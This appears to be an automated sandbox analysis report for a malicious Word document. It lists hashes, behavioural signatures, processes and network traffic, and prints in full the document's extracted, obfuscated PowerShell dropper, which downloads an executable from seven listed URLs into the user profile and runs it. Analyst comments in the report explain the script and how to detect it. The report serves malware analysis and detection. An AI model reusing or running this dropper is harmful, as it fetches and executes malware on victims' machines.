Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20/05/2024, 12:37 UTC

General

  • Target

    5f1bbe19a2333cb402ac624a46014f28_JaffaCakes118.doc

  • Size

    154KB

  • MD5

    5f1bbe19a2333cb402ac624a46014f28

  • SHA1

    6bcd62ad194559166fbd621ff40d5069cc5b2d38

  • SHA256

    e203577dadb325bd364b0a6609b5aa2b4df457ba261810b3e5416950dff54c8f

  • SHA512

    089efbe2850665db146361b3cf64f9701e93d01dd270f500e0a0206fbdffcd5b8a86cda85a3a08c9af70c66fad01245026237bcf7105f4ba9cbcca8356e7f64c

  • SSDEEP

    1536:cQYIQYjrdi1Ir77zOH98Wj2gpngB+a94+dRXalfAW66uud+BbN+rEw1:vrfrzOH98ipgXRE66uuoBsEw1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
# Analyst annotation: the lines starting with '#' are comments added for readers;
# the extracted script on the last line is reproduced unchanged.
#
# What the script does, in statement order:
#   1. New-Item creates the directory %USERPROFILE%\m4Obyxb\O2ee0Qk\.
#   2. [Net.ServicePointManager]::SecurityProtocol is set to the string
#      "tls12, tls11, tls".
#   3. $C43scuh is assembled as %USERPROFILE%\M4obyxb\O2ee0qk\W_c1yyz.exe
#      ([Char]92 is the backslash fed to the -F format operator).
#   4. $Awcx2cw is a Net.WebClient object.
#   5. $Rf9snso is one long string of seven URLs joined with '*', split on
#      [char]42 ('*'). The seven values are the exe.dropper URLs listed under
#      "URLs" in this report.
#   6. For each URL, DownloadFile writes the response body to $C43scuh. Only when
#      the saved file is at least 30822 bytes is it opened with Invoke-Item,
#      and the loop then ends at 'break'.
#   7. catch{} is empty, so any exception raised inside the try block is
#      discarded and the loop moves on to the next URL.
#
# $Y1u9kdm, $Ty0lqd3, $Lldqtcy, $Bcgxfax, $C1jnvi9, $U10cihq, $Q7yl9z5 and
# $Ivteku7 are assigned and never read (presumably padding); the assignment
# placed after 'break' is unreachable.
#
# Note for detection: cmdlet names, member names and URLs are split with string
# concatenation and backticks, so a literal search for "DownloadFile",
# "Invoke-Item" or a hostname will not match this text. Behavioural signals
# visible in this report are more reliable: powershell.exe started with -e in
# the same run as the Office document (see Processes), an .exe written under the
# user profile by powershell.exe, and DNS/HTTP requests to the listed hosts
# (see Network).
$Y1u9kdm=('Yh'+('e0'+'qow'));&('new'+'-item') $enV:USeRPRoFile\m4Obyxb\O2ee0Qk\ -itemtype diRecTorY;[Net.ServicePointManager]::"se`cUr`I`Ty`pRoTOcol" = (('t'+'ls')+('12,'+' '+'tls1')+('1,'+' ')+('tl'+'s'));$Joc_rvg = ('W'+('_c'+'1')+('yy'+'z'));$Ty0lqd3=('C'+'d'+('c'+'3bi7'));$C43scuh=$env:userprofile+(('{0}M4ob'+'y'+'xb{0'+'}O2ee0'+'qk{0}') -F[Char]92)+$Joc_rvg+(('.'+'ex')+'e');$Lldqtcy=('D6'+('j_'+'nu')+'l');$Awcx2cw=&('n'+'ew-obje'+'c'+'t') nET.weBcLiENT;$Rf9snso=('ht'+('t'+'p://')+'g'+'i'+('v'+'in')+'gt'+'h'+'a'+('nksd'+'a')+'il'+'y'+'.'+'c'+('o'+'m/we'+'b/')+('V'+'K/')+('*'+'http')+':/'+'/'+('t'+'skge')+('a'+'r.co')+'m'+('/wp-c'+'on'+'t')+('ent'+'/upl'+'oads/2017')+('/'+'Fo/*'+'h')+('tt'+'p:/')+'/'+('d'+'uol')+('if'+'e-p')+('a'+'rtne')+('r'+'.c')+('o'+'m/wp-c')+'on'+('t'+'ent/')+'p'+('E'+'/*')+('htt'+'p:')+('//p'+'on'+'tu')+('ri'+'basc'+'he')+('t'+'cr')+'i'+('sti'+'a')+'n'+('ion'+'ut')+('.com'+'/wp')+('-'+'ad')+('mi'+'n/G/')+'*h'+('ttp'+'s:')+('/'+'/mrveg'+'gy.')+'c'+('om/e'+'rros/'+'t')+'S1'+('/*'+'http:'+'/')+('/if'+'armer.'+'com.br/_'+'_'+'MACO')+'S'+'X'+'/'+('2w4'+'/*h'+'tt')+('p:/'+'/')+('uni'+'t')+'ed'+('d'+'ataba')+('s'+'e.n'+'et/w'+'p-adm')+'i'+'n/'+('t'+'f/'))."SpL`iT"([char]42);$Bcgxfax=(('Lg6'+'n')+'m'+'6i');foreach($Vafutcz in $Rf9snso){try{$Awcx2cw."DOw`Nl`OA`DFILe"($Vafutcz, $C43scuh);$C1jnvi9=('Z4'+('hv'+'5')+'3u');If ((.('Get'+'-Ite'+'m') $C43scuh)."L`e`NgtH" -ge 30822) {&('Invo'+'k'+'e-Ite'+'m')($C43scuh);$U10cihq=(('G'+'amh')+('k'+'5k'));break;$Q7yl9z5=(('Mx'+'n5c')+'ay')}}catch{}}$Ivteku7=(('V'+'1lh')+'w'+'rz')
URLs
exe.dropper

http://givingthanksdaily.com/web/VK/

exe.dropper

http://tskgear.com/wp-content/uploads/2017/Fo/

exe.dropper

http://duolife-partner.com/wp-content/pE/

exe.dropper

http://ponturibaschetcristianionut.com/wp-admin/G/

exe.dropper

https://mrveggy.com/erros/tS1/

exe.dropper

http://ifarmer.com.br/__MACOSX/2w4/

exe.dropper

http://uniteddatabase.net/wp-admin/tf/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5f1bbe19a2333cb402ac624a46014f28_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1692
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e 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
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2384

Network

  • flag-us
    DNS
    roaming.officeapps.live.com
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    uks-azsc-000.roaming.officeapps.live.com
    uks-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
    osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
    IN A
    52.109.28.47
  • flag-gb
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    WINWORD.EXE
    Remote address:
    52.109.28.47:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_595
    X-OfficeVersion: 16.0.17711.30575
    X-OfficeCluster: uks-000.roaming.officeapps.live.com
    X-CorrelationId: 6c9ddd84-f482-455c-a93c-ab08d56b1c7a
    X-Powered-By: ASP.NET
    Date: Mon, 20 May 2024 12:37:40 GMT
    Content-Length: 654
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    47.28.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    47.28.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    46.28.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    46.28.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    14.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    givingthanksdaily.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    givingthanksdaily.com
    IN A
    Response
    givingthanksdaily.com
    IN A
    66.96.134.60
  • flag-us
    GET
    http://givingthanksdaily.com/web/VK/
    powershell.exe
    Remote address:
    66.96.134.60:80
    Request
    GET /web/VK/ HTTP/1.1
    Host: givingthanksdaily.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Mon, 20 May 2024 12:37:42 GMT
    Content-Type: text/html
    Content-Length: 867
    Connection: keep-alive
    Server: Apache
    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
    Accept-Ranges: bytes
    Expires: Mon, 20 May 2024 12:37:51 GMT
    Age: 1
  • flag-us
    DNS
    tskgear.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    tskgear.com
    IN A
    Response
    tskgear.com
    IN A
    103.197.57.20
  • flag-us
    DNS
    6.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    6.173.189.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    60.134.96.66.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    60.134.96.66.in-addr.arpa
    IN PTR
    Response
    60.134.96.66.in-addr.arpa
    IN PTR
    601349666staticeigboxnet
  • flag-my
    GET
    http://tskgear.com/wp-content/uploads/2017/Fo/
    powershell.exe
    Remote address:
    103.197.57.20:80
    Request
    GET /wp-content/uploads/2017/Fo/ HTTP/1.1
    Host: tskgear.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Mon, 20 May 2024 12:37:43 GMT
    Server: Apache/2
    Location: https://tskgear.com/wp-content/uploads/2017/Fo/
    Content-Length: 255
    Keep-Alive: timeout=2, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
  • flag-my
    GET
    https://tskgear.com/wp-content/uploads/2017/Fo/
    powershell.exe
    Remote address:
    103.197.57.20:443
    Request
    GET /wp-content/uploads/2017/Fo/ HTTP/1.1
    Host: tskgear.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Mon, 20 May 2024 12:37:45 GMT
    Server: Apache/2
    X-Powered-By: PHP/8.0.30
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Redirect-By: WordPress
    Location: https://tskgear.com/product/foscor-double-helical/
    Vary: User-Agent
    Content-Length: 0
    Keep-Alive: timeout=2, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-my
    GET
    https://tskgear.com/product/foscor-double-helical/
    powershell.exe
    Remote address:
    103.197.57.20:443
    Request
    GET /product/foscor-double-helical/ HTTP/1.1
    Host: tskgear.com
    Response
    HTTP/1.1 200 OK
    Date: Mon, 20 May 2024 12:37:46 GMT
    Server: Apache/2
    X-Powered-By: PHP/8.0.30
    Link: <https://tskgear.com/wp-json/>; rel="https://api.w.org/", <https://tskgear.com/wp-json/wp/v2/product/2919>; rel="alternate"; type="application/json", <https://tskgear.com/?p=2919>; rel=shortlink
    Vary: Accept-Encoding,User-Agent
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    20.57.197.103.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    20.57.197.103.in-addr.arpa
    IN PTR
    Response
    20.57.197.103.in-addr.arpa
    IN PTR
    da mymymarketcommy
  • flag-be
    GET
    https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    88.221.83.184:443
    Request
    GET /th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 999
    date: Mon, 20 May 2024 12:37:45 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.b453dd58.1716208665.8a243e8
  • flag-us
    DNS
    26.35.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.35.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    184.83.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    184.83.221.88.in-addr.arpa
    IN PTR
    Response
    184.83.221.88.in-addr.arpa
    IN PTR
    a88-221-83-184deploystaticakamaitechnologiescom
  • flag-us
    DNS
    226.21.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    226.21.18.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    duolife-partner.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    duolife-partner.com
    IN A
    Response
  • flag-us
    DNS
    ponturibaschetcristianionut.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    ponturibaschetcristianionut.com
    IN A
    Response
  • flag-us
    DNS
    mrveggy.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    mrveggy.com
    IN A
    Response
    mrveggy.com
    IN A
    177.12.170.95
  • flag-br
    GET
    https://mrveggy.com/erros/tS1/
    powershell.exe
    Remote address:
    177.12.170.95:443
    Request
    GET /erros/tS1/ HTTP/1.1
    Host: mrveggy.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 403 Forbidden
    Date: Mon, 20 May 2024 12:37:49 GMT
    Server: Apache
    Content-Length: 380
    Keep-Alive: timeout=5, max=500
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
  • flag-us
    DNS
    ifarmer.com.br
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    ifarmer.com.br
    IN A
    Response
  • flag-us
    DNS
    uniteddatabase.net
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    uniteddatabase.net
    IN A
    Response
    uniteddatabase.net
    IN A
    173.254.237.178
  • flag-us
    DNS
    95.170.12.177.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.170.12.177.in-addr.arpa
    IN PTR
    Response
    95.170.12.177.in-addr.arpa
    IN PTR
    web-ded-218851akinghostnet
  • flag-us
    GET
    http://uniteddatabase.net/wp-admin/tf/
    powershell.exe
    Remote address:
    173.254.237.178:80
    Request
    GET /wp-admin/tf/ HTTP/1.1
    Host: uniteddatabase.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    Date: Mon, 20 May 2024 12:37:49 GMT
    Server: Apache
    Location: http://uniteddatabase.net/cgi-sys/suspendedpage.cgi
    Content-Length: 235
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
  • flag-us
    GET
    http://uniteddatabase.net/cgi-sys/suspendedpage.cgi
    powershell.exe
    Remote address:
    173.254.237.178:80
    Request
    GET /cgi-sys/suspendedpage.cgi HTTP/1.1
    Host: uniteddatabase.net
    Response
    HTTP/1.1 200 OK
    Date: Mon, 20 May 2024 12:37:50 GMT
    Server: Apache
    Transfer-Encoding: chunked
    Content-Type: text/html
  • flag-us
    DNS
    178.237.254.173.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    178.237.254.173.in-addr.arpa
    IN PTR
    Response
    178.237.254.173.in-addr.arpa
    IN PTR
    serverinfoscapemediacom
  • flag-us
    DNS
    metadata.templates.cdn.office.net
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    metadata.templates.cdn.office.net
    IN A
    Response
    metadata.templates.cdn.office.net
    IN CNAME
    templatesmetadata.office.net
    templatesmetadata.office.net
    IN CNAME
    templatesmetadata.office.net.edgekey.net
    templatesmetadata.office.net.edgekey.net
    IN CNAME
    e26769.dscb.akamaiedge.net
    e26769.dscb.akamaiedge.net
    IN A
    23.62.61.162
    e26769.dscb.akamaiedge.net
    IN A
    23.62.61.184
  • flag-nl
    GET
    https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
    WINWORD.EXE
    Remote address:
    23.62.61.162:443
    Request
    GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: metadata.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Type: text/xml
    Server: Kestrel
    Content-Encoding: gzip
    Content-Length: 1264
    Cache-Control: max-age=139264
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-us
    DNS
    binaries.templates.cdn.office.net
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    binaries.templates.cdn.office.net
    IN A
    Response
    binaries.templates.cdn.office.net
    IN CNAME
    binaries.templates.cdn.office.net.edgesuite.net
    binaries.templates.cdn.office.net.edgesuite.net
    IN CNAME
    a1847.dscg2.akamai.net
    a1847.dscg2.akamai.net
    IN A
    2.17.251.23
    a1847.dscg2.akamai.net
    IN A
    2.17.251.17
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp01840907.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 43653
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
    Last-Modified: Fri, 22 Apr 2016 16:08:15 GMT
    ETag: 0x8D36AC84F8E1FB0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 333d986d-301e-008a-4b97-a0d19b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851216.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 34816
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: YoYxJM3NoTXswOcieCy4iA==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC4993E3EB5
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 15d55d85-901e-0125-6d97-a0e68f000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851220.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31482
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC499D1A9F8
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 62995edb-d01e-0069-0697-a067c5000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851219.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31605
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
    Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
    ETag: 0x8D36AC8822FFB6E
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: cb58b91a-201e-00f4-4797-a041dc000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp1000111403.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 953453
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 1OrACenntkuLABroK4EC+g==
    Last-Modified: Thu, 12 Jul 2018 00:20:10 GMT
    ETag: 0x8D5E78D3A9D8C97
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: faf4e13b-801e-0036-5697-a0075a000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851221.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31562
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC499FED5FF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: dacba60e-401e-0105-7097-a08a43000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403393701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 3256855
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
    Last-Modified: Wed, 29 Aug 2018 18:19:39 GMT
    ETag: 0x8D60DDBFC361FBC
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a1f8b712-201e-001a-6997-a01706000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328884.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
